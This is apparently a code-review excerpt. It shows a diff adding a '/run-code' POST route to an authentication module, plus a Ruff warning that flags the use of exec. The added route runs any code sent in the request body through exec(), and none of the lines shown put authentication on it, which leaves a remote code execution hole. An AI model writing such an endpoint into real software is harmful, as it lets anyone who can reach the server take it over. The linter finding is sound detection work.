app/auth/routes.py

```
@@ -132,4 +179,86 @@ async def verify_token(current_user: Dict[str, Any] = Depends(get_current_user))
         }
-    } 
\ No newline at end of file
+    } 
+
+
+@router.post("/run-code")
+async def run_code(code: str = Body("")):
+
+    local_vars: Dict[str, Any] = {}
+    try:
+        exec(code, {}, local_vars)
```

Ruff (0.13.1)

Use of `exec` detected

(S102)